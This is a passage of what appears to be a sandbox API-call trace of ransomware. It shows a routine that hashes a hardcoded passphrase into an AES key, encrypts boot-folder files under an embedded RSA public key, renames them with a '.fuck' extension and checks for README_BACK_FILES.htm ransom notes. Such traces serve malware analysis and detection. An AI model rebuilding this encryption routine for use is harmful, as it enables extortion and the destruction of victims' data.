dwFlags=0x0 | out: phProv=0x2b9e408*=0x276b5e0) returned 1 [0231.569] CryptCreateHash (in: hProv=0x276b5e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.569] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.569] CryptHashData (hHash=0x2716c68, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.569] CryptDeriveKey (in: hProv=0x276b5e0, Algid=0x6610, hBaseData=0x2716c68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716aa8) returned 1 [0231.570] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.570] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.570] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x276a568) returned 1 [0231.570] CryptImportPublicKeyInfo (in: hCryptProv=0x276a568, dwCertEncodingType=0x1, pInfo=0x277c750*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277c780*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277c788*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x2716ca8) returned 1 [0231.570] CryptEncrypt (in: hKey=0x2716ca8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.570] CryptEncrypt (in: hKey=0x2716ca8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276a5f0*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x276a5f0*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.570] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276a5f0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.570] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2717780, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2717780, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.570] CryptEncrypt (in: hKey=0x2716aa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2717780*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2717780*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.570] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2717780, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.570] CloseHandle (hObject=0xffffffff) returned 1 [0231.570] CloseHandle (hObject=0xffffffff) returned 1 [0231.571] CopyFileA (lpExistingFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.571] SetFileAttributesA (lpFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.571] DeleteFileA (lpFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui.gsg")) returned 0 [0231.571] MoveFileA (lpExistingFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\ko-KR\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui.fuck")) returned 0 [0231.571] CryptDestroyHash (hHash=0x2716c68) returned 1 [0231.571] CryptDestroyKey (hKey=0x2716aa8) returned 1 [0231.571] CryptReleaseContext (hProv=0x276b5e0, dwFlags=0x0) returned 1 [0231.571] FindNextFileA (in: hFindFile=0x2716968, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.572] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.572] GetLastError () returned 0x5 [0231.572] GetFileAttributesA (lpFileName="C:\\\\Boot\\ko-KR\\memtest.exe.mui" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui")) returned 0x20 [0231.587] SetFileAttributesA (lpFileName="C:\\\\Boot\\ko-KR\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0231.587] CreateFileA (lpFileName="C:\\\\Boot\\ko-KR\\memtest.exe.mui" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.587] CreateFileA (lpFileName="C:\\\\Boot\\ko-KR\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.587] SetFileAttributesA (lpFileName="C:\\\\Boot\\ko-KR\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.587] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x275b610) returned 1 [0231.590] CryptCreateHash (in: hProv=0x275b610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.590] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.590] CryptHashData (hHash=0x2716ee8, pbData=0x2ec8f0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.590] CryptDeriveKey (in: hProv=0x275b610, Algid=0x6610, hBaseData=0x2716ee8, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716c28) returned 1 [0231.590] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.590] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.590] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x276b5e0) returned 1 [0231.590] CryptImportPublicKeyInfo (in: hCryptProv=0x276b5e0, dwCertEncodingType=0x1, pInfo=0x277cd00*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277cd30*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277cd38*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x2716da8) returned 1 [0231.590] CryptEncrypt (in: hKey=0x2716da8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.590] CryptEncrypt (in: hKey=0x2716da8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276ab40*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x276ab40*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.591] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276ab40, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.591] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2782b10, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2782b10, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.591] CryptEncrypt (in: hKey=0x2716c28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2782b10*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2782b10*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.591] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2782b10, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.591] CloseHandle (hObject=0xffffffff) returned 1 [0231.591] CloseHandle (hObject=0xffffffff) returned 1 [0231.591] CopyFileA (lpExistingFileName="C:\\\\Boot\\ko-KR\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\ko-KR\\memtest.exe.mui" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0231.591] SetFileAttributesA (lpFileName="C:\\\\Boot\\ko-KR\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0231.592] DeleteFileA (lpFileName="C:\\\\Boot\\ko-KR\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui.gsg")) returned 0 [0231.592] MoveFileA (lpExistingFileName="C:\\\\Boot\\ko-KR\\memtest.exe.mui" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\ko-KR\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui.fuck")) returned 0 [0231.592] CryptDestroyHash (hHash=0x2716ee8) returned 1 [0231.592] CryptDestroyKey (hKey=0x2716c28) returned 1 [0231.592] CryptReleaseContext (hProv=0x275b610, dwFlags=0x0) returned 1 [0231.593] FindNextFileA (in: hFindFile=0x2716968, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.593] FindNextFileA (in: hFindFile=0x2716968, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.593] FindClose (in: hFindFile=0x2716968 | out: hFindFile=0x2716968) returned 1 [0231.593] GetFileAttributesA (lpFileName="C:\\\\Boot\\ko-KR\\README_BACK_FILES.htm" (normalized: "c:\\boot\\ko-kr\\readme_back_files.htm")) returned 0x20 [0231.594] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.594] FindFirstFileA (in: lpFileName="C:\\\\Boot\\lt-LT\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x2716ee8 [0231.594] FindNextFileA (in: hFindFile=0x2716ee8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.594] FindNextFileA (in: hFindFile=0x2716ee8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.594] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.594] GetLastError () returned 0x12 [0231.594] GetFileAttributesA (lpFileName="C:\\\\Boot\\lt-LT\\bootmgr.exe.mui" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui")) returned 0x20 [0231.595] SetFileAttributesA (lpFileName="C:\\\\Boot\\lt-LT\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.595] CreateFileA (lpFileName="C:\\\\Boot\\lt-LT\\bootmgr.exe.mui" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.595] CreateFileA (lpFileName="C:\\\\Boot\\lt-LT\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.595] SetFileAttributesA (lpFileName="C:\\\\Boot\\lt-LT\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.595] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x276acd8) returned 1 [0231.597] CryptCreateHash (in: hProv=0x276acd8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.597] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.597] CryptHashData (hHash=0x2716928, pbData=0x2ec760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.597] CryptDeriveKey (in: hProv=0x276acd8, Algid=0x6610, hBaseData=0x2716928, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x27169e8) returned 1 [0231.597] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.597] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.597] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x275b610) returned 1 [0231.598] CryptImportPublicKeyInfo (in: hCryptProv=0x275b610, dwCertEncodingType=0x1, pInfo=0x277bd90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277bdc0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277bdc8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x2716ae8) returned 1 [0231.598] CryptEncrypt (in: hKey=0x2716ae8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.598] CryptEncrypt (in: hKey=0x2716ae8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27817f8*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x27817f8*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.598] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27817f8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.598] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2782b10, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2782b10, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.598] CryptEncrypt (in: hKey=0x27169e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2782b10*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2782b10*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.598] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2782b10, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.598] CloseHandle (hObject=0xffffffff) returned 1 [0231.598] CloseHandle (hObject=0xffffffff) returned 1 [0231.598] CopyFileA (lpExistingFileName="C:\\\\Boot\\lt-LT\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\lt-LT\\bootmgr.exe.mui" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.598] SetFileAttributesA (lpFileName="C:\\\\Boot\\lt-LT\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.599] DeleteFileA (lpFileName="C:\\\\Boot\\lt-LT\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui.gsg")) returned 0 [0231.599] MoveFileA (lpExistingFileName="C:\\\\Boot\\lt-LT\\bootmgr.exe.mui" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\lt-LT\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui.fuck")) returned 0 [0231.599] CryptDestroyHash (hHash=0x2716928) returned 1 [0231.599] CryptDestroyKey (hKey=0x27169e8) returned 1 [0231.599] CryptReleaseContext (hProv=0x276acd8, dwFlags=0x0) returned 1 [0231.599] FindNextFileA (in: hFindFile=0x2716ee8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.599] FindNextFileA (in: hFindFile=0x2716ee8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.599] FindClose (in: hFindFile=0x2716ee8 | out: hFindFile=0x2716ee8) returned 1 [0231.599] GetFileAttributesA (lpFileName="C:\\\\Boot\\lt-LT\\README_BACK_FILES.htm" (normalized: "c:\\boot\\lt-lt\\readme_back_files.htm")) returned 0x20 [0231.600] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.600] FindFirstFileA (in: lpFileName="C:\\\\Boot\\lv-LV\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x2716b28 [0231.601] FindNextFileA (in: hFindFile=0x2716b28, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.601] FindNextFileA (in: hFindFile=0x2716b28, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.601] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.601] GetLastError () returned 0x12 [0231.601] GetFileAttributesA (lpFileName="C:\\\\Boot\\lv-LV\\bootmgr.exe.mui" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui")) returned 0x20 [0231.601] SetFileAttributesA (lpFileName="C:\\\\Boot\\lv-LV\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.601] CreateFileA (lpFileName="C:\\\\Boot\\lv-LV\\bootmgr.exe.mui" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.601] CreateFileA (lpFileName="C:\\\\Boot\\lv-LV\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.602] SetFileAttributesA (lpFileName="C:\\\\Boot\\lv-LV\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.602] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x2781440) returned 1 [0231.604] CryptCreateHash (in: hProv=0x2781440, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.604] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.604] CryptHashData (hHash=0x2716e68, pbData=0x2ec8a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.604] CryptDeriveKey (in: hProv=0x2781440, Algid=0x6610, hBaseData=0x2716e68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716aa8) returned 1 [0231.604] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.604] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.604] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x2781550) returned 1 [0231.604] CryptImportPublicKeyInfo (in: hCryptProv=0x2781550, dwCertEncodingType=0x1, pInfo=0x277c1a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277c1d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277c1d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x2716ea8) returned 1 [0231.604] CryptEncrypt (in: hKey=0x2716ea8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.605] CryptEncrypt (in: hKey=0x2716ea8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2781bb0*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x2781bb0*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.605] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2781bb0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.605] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2782b10, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2782b10, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.605] CryptEncrypt (in: hKey=0x2716aa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2782b10*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2782b10*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.605] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2782b10, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.605] CloseHandle (hObject=0xffffffff) returned 1 [0231.605] CloseHandle (hObject=0xffffffff) returned 1 [0231.605] CopyFileA (lpExistingFileName="C:\\\\Boot\\lv-LV\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\lv-LV\\bootmgr.exe.mui" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.605] SetFileAttributesA (lpFileName="C:\\\\Boot\\lv-LV\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.605] DeleteFileA (lpFileName="C:\\\\Boot\\lv-LV\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui.gsg")) returned 0 [0231.605] MoveFileA (lpExistingFileName="C:\\\\Boot\\lv-LV\\bootmgr.exe.mui" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\lv-LV\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui.fuck")) returned 0 [0231.606] CryptDestroyHash (hHash=0x2716e68) returned 1 [0231.606] CryptDestroyKey (hKey=0x2716aa8) returned 1 [0231.606] CryptReleaseContext (hProv=0x2781440, dwFlags=0x0) returned 1 [0231.606] FindNextFileA (in: hFindFile=0x2716b28, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.606] FindNextFileA (in: hFindFile=0x2716b28, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.606] FindClose (in: hFindFile=0x2716b28 | out: hFindFile=0x2716b28) returned 1 [0231.606] GetFileAttributesA (lpFileName="C:\\\\Boot\\lv-LV\\README_BACK_FILES.htm" (normalized: "c:\\boot\\lv-lv\\readme_back_files.htm")) returned 0x20 [0231.607] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.607] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.607] FindFirstFileA (in: lpFileName="C:\\\\Boot\\nb-NO\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x2716c68 